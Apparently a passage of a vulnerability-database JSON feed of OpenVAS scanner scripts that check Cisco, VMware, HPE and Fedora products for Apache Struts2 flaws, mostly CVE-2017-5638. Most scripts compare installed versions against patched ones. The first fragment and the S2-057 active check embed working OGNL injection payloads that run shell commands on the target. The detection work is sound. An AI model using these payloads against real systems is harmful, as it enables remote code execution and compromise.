\"opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().\" +\n \"clear()).(#context.setMemberAccess(#dm)))).(#p=new java.lang.ProcessBuilder(\" + c + \")).\" +\n \"(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().\" +\n \"getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}\";\n\n req = http_post_put_req( port:port, url:url, data:data, add_headers:make_array( \"Content-Type:\", ex ) );\n buf = http_keepalive_send_recv( port:port, data:req, bodyonly:FALSE );\n\n if( egrep( pattern:cmd, string:buf ) )\n {\n report = 'It was possible to execute the command `' + cmds[ cmd ] + '` on the remote host.\\n\\nRequest:\\n\\n' + req + '\\n\\nResponse:\\n\\n' + buf;\n security_message( port:port, data:report );\n exit( 0 );\n }\n }\n if( x > 25 ) break;\n}\n\nexit( 0 );\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:11", "description": "Cisco ISE is prone to a vulnerability in Apache Struts2.", "cvss3": {}, "published": "2017-03-13T00:00:00", "type": "openvas", "title": "Cisco Identity Services Engine Apache Struts2 Jakarta Multipart Parser File Upload Code Execution Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310106640", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310106640", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_cisco_ise_cisco-sa-20170310-struts2.nasl 12106 2018-10-26 06:33:36Z cfischer $\n#\n# Cisco Identity Services Engine Apache Struts2 Jakarta Multipart Parser File Upload Code Execution Vulnerability\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:cisco:identity_services_engine\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.106640\");\n script_cve_id(\"CVE-2017-5638\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 12106 $\");\n\n script_name(\"Cisco Identity Services Engine Apache Struts2 Jakarta Multipart Parser File Upload Code Execution Vulnerability\");\n\n script_xref(name:\"URL\", value:\"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170310-struts2\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"solution\", value:\"See the referenced vendor advisory for a solution.\");\n\n script_tag(name:\"summary\", value:\"Cisco ISE is prone to a vulnerability in Apache Struts2.\");\n\n script_tag(name:\"insight\", value:\"On March 6, 2017, Apache disclosed a vulnerability in the Jakarta multipart\nparser used in Apache Struts2 that could allow an attacker to execute commands remotely on the targeted system\nusing a crafted Content-Type header value.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 08:33:36 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-03-13 11:35:28 +0700 (Mon, 13 Mar 2017)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"CISCO\");\n script_copyright(\"This script is Copyright (C) 2017 Greenbone Networks GmbH\");\n script_dependencies(\"gb_cisco_ise_version.nasl\");\n script_mandatory_keys(\"cisco_ise/version\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!version = get_app_version(cpe: CPE))\n exit(0);\n\naffected = make_list('1.3.0.876',\n '1.4.0.253',\n '2.0.0.306',\n '2.2.0.470',\n '2.0.1.130',\n '2.1.0.474',\n '2.2.0.471');\n\nforeach af (affected) {\n if (version == af) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"See advisory\");\n security_message(port: 0, data: report);\n exit(0);\n }\n}\n\nexit(99);\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-06T16:26:00", "description": "VMware product updates resolve remote code execution vulnerability via Apache Struts 2", "cvss3": {}, "published": "2017-03-16T00:00:00", "type": "openvas", "title": "VMSA-2017-0004: VMware product updates resolve remote code execution vulnerability via Apache Struts 2", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2019-12-05T00:00:00", "id": "OPENVAS:1361412562310140190", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310140190", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# VMSA-2017-0004: VMware product updates resolve remote code execution vulnerability via Apache Struts 2\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.140190\");\n script_cve_id(\"CVE-2017-5638\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"2019-12-05T15:10:00+0000\");\n script_name(\"VMSA-2017-0004: VMware product updates resolve remote code execution vulnerability via Apache Struts 2\");\n\n script_xref(name:\"URL\", value:\"http://www.vmware.com/security/advisories/VMSA-2017-0004.html\");\n\n script_tag(name:\"vuldetect\", value:\"Check the build number\");\n\n script_tag(name:\"insight\", value:\"Remote code execution vulnerability via Apache Struts 2\nMultiple VMware products contain a remote code execution vulnerability due to the use of Apache Struts 2. Successful exploitation of this issue may result in the complete compromise of an affected product.\");\n\n script_tag(name:\"solution\", value:\"See vendor advisory for a solution.\");\n\n script_tag(name:\"summary\", value:\"VMware product updates resolve remote code execution vulnerability via Apache Struts 2\");\n\n script_tag(name:\"affected\", value:\"vCenter 6.5 and 6.0\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"last_modification\", value:\"2019-12-05 15:10:00 +0000 (Thu, 05 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-03-16 09:26:49 +0100 (Thu, 16 Mar 2017)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_copyright(\"This script is Copyright (C) 2017 Greenbone Networks GmbH\");\n script_dependencies(\"gb_vmware_vcenter_detect.nasl\");\n script_mandatory_keys(\"VMware_vCenter/version\", \"VMware_vCenter/build\");\n\n exit(0);\n\n}\ninclude(\"vmware_esx.inc\");\n\nif ( ! vcenter_version = get_kb_item(\"VMware_vCenter/version\") ) exit( 0 );\nif ( ! vcenter_build = get_kb_item(\"VMware_vCenter/build\") ) exit( 0 );\n\nif( vcenter_version == \"6.0.0\" )\n if ( int( vcenter_build ) <= int( 5112506 ) ) fix = 'See advisory.';\n\nif( vcenter_version == \"6.5.0\" )\n if ( int( vcenter_build ) < int( 5178943 ) ) fix = '6.5.0b';\n\nif( fix )\n{\n security_message( port:0, data: esxi_remote_report( ver:vcenter_version, build: vcenter_build, fixed_build:fix, typ:'vCenter' ) );\n exit(0);\n}\n\nexit(99);\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:33:52", "description": "VMware product updates resolve remote code execution vulnerability via Apache Struts 2", "cvss3": {}, "published": "2017-03-31T00:00:00", "type": "openvas", "title": "VMSA-201-0004: vRealize Operations (vROps) Remote Code Execution Vulnerability Via Apache Struts 2", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310140229", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310140229", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_vmware_vrealize_operations_manager_VMSA-2017-0004.nasl 12106 2018-10-26 06:33:36Z cfischer $\n#\n# VMSA-201-0004: vRealize Operations (vROps) Remote Code Execution Vulnerability Via Apache Struts 2\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = 'cpe:/a:vmware:vrealize_operations_manager';\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.140229\");\n script_cve_id(\"CVE-2017-5638\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 12106 $\");\n script_name(\"VMSA-201-0004: vRealize Operations (vROps) Remote Code Execution Vulnerability Via Apache Struts 2\");\n\n script_xref(name:\"URL\", value:\"http://www.vmware.com/security/advisories/VMSA-2017-0004.html\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"solution\", value:\"Updates are available\");\n\n script_tag(name:\"summary\", value:\"VMware product updates resolve remote code execution vulnerability via Apache Struts 2\");\n script_tag(name:\"insight\", value:\"Multiple VMware products contain a remote code execution vulnerability due to the use of Apache Struts 2. Successful exploitation of this issue may result in the complete compromise of an affected product.\");\n\n script_tag(name:\"affected\", value:\"vROps 6.2.1, 6.3, 6.4 and 6.5\");\n\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 08:33:36 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-03-31 10:25:48 +0200 (Fri, 31 Mar 2017)\");\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_family(\"VMware Local Security Checks\");\n script_copyright(\"This script is Copyright (C) 2017 Greenbone Networks GmbH\");\n script_dependencies(\"gb_vmware_vrealize_operations_manager_web_detect.nasl\");\n script_mandatory_keys(\"vmware/vrealize/operations_manager/version\", \"vmware/vrealize/operations_manager/build\");\n\n exit(0);\n\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) ) exit( 0 );\n\nif( ! version = get_app_version( cpe:CPE, port:port ) ) exit( 0 );\n\nif( ! build = get_kb_item( \"vmware/vrealize/operations_manager/build\" ) ) exit( 0 );\n\nif( version =~ \"^6\\.3\\.0\" )\n if( int( build ) < int( 5263486 ) ) fix = '6.3.0 Build 5263486';\n\nif( version =~ \"^6\\.2\\.1\" )\n if( int( build ) < int( 5263486 ) ) fix = '6.2.1 Build 5263486';\n\nif( version =~ \"^6\\.4\\.0\" )\n if( int( build ) < int( 5263486 ) ) fix = '6.4.0 Build 5263486';\n\nif( version =~ \"^6\\.5\\.0\" )\n if( int( build ) < int( 5263486 ) ) fix = '6.5.0 Build 5263486';\n\n\nif( fix )\n{\n report = report_fixed_ver( installed_version:version + ' Build ' + build, fixed_version:fix );\n security_message( port:port, data:report );\n exit(0);\n}\n\nexit( 99 );\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:24", "description": "Cisco Unified Communications Manager is prone to a vulnerability in Apache\nStruts2.", "cvss3": {}, "published": "2017-03-14T00:00:00", "type": "openvas", "title": "Cisco Unified Communications Manager Apache Struts2 Jakarta Multipart Parser File Upload Code Execution Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310106647", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310106647", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_cisco_cucm_cisco-sa-20170310-struts2.nasl 12106 2018-10-26 06:33:36Z cfischer $\n#\n# Cisco Unified Communications Manager Apache Struts2 Jakarta Multipart Parser File Upload Code Execution Vulnerability\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:cisco:unified_communications_manager\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.106647\");\n script_cve_id(\"CVE-2017-5638\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 12106 $\");\n\n script_name(\"Cisco Unified Communications Manager Apache Struts2 Jakarta Multipart Parser File Upload Code Execution Vulnerability\");\n\n script_xref(name:\"URL\", value:\"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170310-struts2\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"solution\", value:\"See the referenced vendor advisory for a solution.\");\n\n script_tag(name:\"summary\", value:\"Cisco Unified Communications Manager is prone to a vulnerability in Apache\nStruts2.\");\n\n script_tag(name:\"insight\", value:\"On March 6, 2017, Apache disclosed a vulnerability in the Jakarta multipart\nparser used in Apache Struts2 that could allow an attacker to execute commands remotely on the targeted system\nusing a crafted Content-Type header value.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 08:33:36 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-03-14 09:51:18 +0700 (Tue, 14 Mar 2017)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"CISCO\");\n script_copyright(\"This script is Copyright (C) 2017 Greenbone Networks GmbH\");\n script_dependencies(\"gb_cisco_cucm_version.nasl\");\n script_mandatory_keys(\"cisco/cucm/version\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!version = get_app_version(cpe: CPE))\n exit(0);\n\nversion = str_replace( string:version, find:\"-\", replace:\".\" );\n\nif (version =~ \"^11\\.0\" || version =~ \"^11\\.5\") {\n report = report_fixed_ver(installed_version: version, fixed_version: \"See advisory\");\n security_message(port: 0, data: report);\n exit(0);\n}\n\nexit(99);\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:01", "description": "HPE Universal CMDB is prone to a remote code execution vulnerability in\nApache Struts.", "cvss3": {}, "published": "2017-04-10T00:00:00", "type": "openvas", "title": "HPE Universal CMDB Remote Code Execution Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310106736", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310106736", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_hpe_universal_cmdb_struts_vuln.nasl 12106 2018-10-26 06:33:36Z cfischer $\n#\n# HPE Universal CMDB Remote Code Execution Vulnerability\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = 'cpe:/a:hp:universal_cmbd_foundation';\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.106736\");\n script_version(\"$Revision: 12106 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 08:33:36 +0200 (Fri, 26 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-04-10 12:58:34 +0200 (Mon, 10 Apr 2017)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_cve_id(\"CVE-2017-5638\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"HPE Universal CMDB Remote Code Execution Vulnerability\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"This script is Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_hpe_universal_cmdb_detect.nasl\");\n script_mandatory_keys(\"HP/UCMDB/Installed\");\n\n script_tag(name:\"summary\", value:\"HPE Universal CMDB is prone to a remote code execution vulnerability in\nApache Struts.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"A potential security vulnerability in Jakarta Multipart parser in Apache\nStruts has been addressed in HPE Universal CMDB. This vulnerability could be remotely exploited to allow code\nexecution via mishandled file upload.\");\n\n script_tag(name:\"affected\", value:\"HP Universal CMDB Foundation Software v10.22 CUP5\");\n\n script_tag(name:\"solution\", value:\"HPE has made mitigation information available to resolve the vulnerability\nfor the impacted versions of HPE Universal CMDB.\");\n\n script_xref(name:\"URL\", value:\"https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbgn03733en_us\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!version = get_app_version(cpe: CPE, port: port))\n exit(0);\n\nif (version_is_equal(version: version, test_version: \"10.22\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"See advisory\");\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-05-08T10:31:11", "description": "This host is running Apache Struts and is prone to a remote code execution\nvulnerability.", "cvss3": {}, "published": "2018-08-27T00:00:00", "type": "openvas", "title": "Apache Struts2 Remote Code Execution Vulnerability (S2-057) (Active Check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5638", "CVE-2018-11776"], "modified": "2020-05-05T00:00:00", "id": "OPENVAS:1361412562310141398", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310141398", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apache Struts2 Remote Code Execution Vulnerability (S2-057) (Active Check)\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.141398\");\n script_version(\"2020-05-05T10:19:36+0000\");\n script_tag(name:\"last_modification\", value:\"2020-05-05 10:19:36 +0000 (Tue, 05 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-08-27 13:07:39 +0700 (Mon, 27 Aug 2018)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_cve_id(\"CVE-2017-5638\");\n\n script_tag(name:\"qod_type\", value:\"exploit\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Apache Struts2 Remote Code Execution Vulnerability (S2-057) (Active Check)\");\n\n script_category(ACT_ATTACK);\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"find_service.nasl\", \"httpver.nasl\", \"webmirror.nasl\", \"DDI_Directory_Scanner.nasl\", \"os_detection.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"www/action_jsp_do\");\n\n script_tag(name:\"vuldetect\", value:\"Try to execute a command by sending a special crafted HTTP GET request.\");\n\n script_tag(name:\"summary\", value:\"This host is running Apache Struts and is prone to a remote code execution\nvulnerability.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to errors in conditions when namespace value isn't set for\na result defined in underlying configurations and in same time, its upper action(s) configurations have no or\nwildcard namespace. Same possibility when using url tag which doesn't have value and action set and in same time,\nits upper action(s) configurations have no or wildcard namespace.\");\n\n script_tag(name:\"affected\", value:\"Apache Struts versions 2.3 through 2.3.34 and 2.5 through 2.5.16\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apache Struts version 2.3.35 or 2.5.17 or later.\");\n\n script_xref(name:\"URL\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-057\");\n script_xref(name:\"URL\", value:\"https://semmle.com/news/apache-struts-CVE-2018-11776\");\n script_xref(name:\"URL\", value:\"https://lgtm.com/blog/apache_struts_CVE-2018-11776\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"misc_func.inc\");\n\nport = http_get_port(default: 80);\nhost = http_host_name(dont_add_port: TRUE);\n\nurls = make_list();\n\nexts = http_get_kb_file_extensions(port: port, host: host, ext: \"action\");\nif (exts && is_array(exts))\n urls = make_list(urls, exts);\n\ncmds = exploit_commands();\n\nforeach url (urls) {\n path = eregmatch(pattern: \"(.*/)([^.]+\\.action)\", string: url);\n if (isnull(path[2]))\n continue;\n\n action = path[2];\n dir = path[1];\n\n foreach cmd (keys(cmds)) {\n url_check = dir + \"%24%7B%28%23_memberAccess%5B%27allowStaticMethodAccess%27%5D%3Dtrue%29.\" +\n \"%28%23cmd%3D%27\" + cmds[cmd] + \"%27%29.%28%23iswin%3D%28%40\" +\n \"java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27\" +\n \"win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27/c%27%2C%23cmd%7D%3A%7B\" +\n \"%27bash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder\" +\n \"%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start\" +\n \"%28%29%29.%28%23ros%3D%28%40org.apache.struts2.ServletActionContext%40getResponse\" +\n \"%28%29.getOutputStream%28%29%29%29.%28%40org.apache.commons.io.IOUtils%40copy\" +\n \"%28%23process.getInputStream%28%29%2C%23ros%29%29.%28%23ros.flush%28%29%29%7D/\" + action;\n\n if (http_vuln_check(port: port, url: url_check, pattern: cmd, check_header: TRUE)) {\n report = http_report_vuln_url(port: port, url: url_check);\n security_message(port: port, data: report);\n exit(0);\n }\n }\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:56", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-07-02T00:00:00", "type": "openvas", "title": "Fedora Update for struts FEDORA-2016-d717fdcf74", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1182", "CVE-2016-1181"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310808530", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310808530", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for struts FEDORA-2016-d717fdcf74\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.808530\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-07-02 06:38:46 +0200 (Sat, 02 Jul 2016)\");\n script_cve_id(\"CVE-2016-1181\", \"CVE-2016-1182\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for struts FEDORA-2016-d717fdcf74\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'struts'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"struts on Fedora 24\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-d717fdcf74\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UQI2PYM3R4FWEOVHIFT7KUPTILG2DFMZ\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC24\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC24\")\n{\n\n if ((res = isrpmvuln(pkg:\"struts\", rpm:\"struts~1.3.10~18.fc24\", rls:\"FC24\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:35:03", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-07-02T00:00:00", "type": "openvas", "title": "Fedora Update for struts FEDORA-2016-21bd6a33af", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1182", "CVE-2016-1181"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310808523", "href": 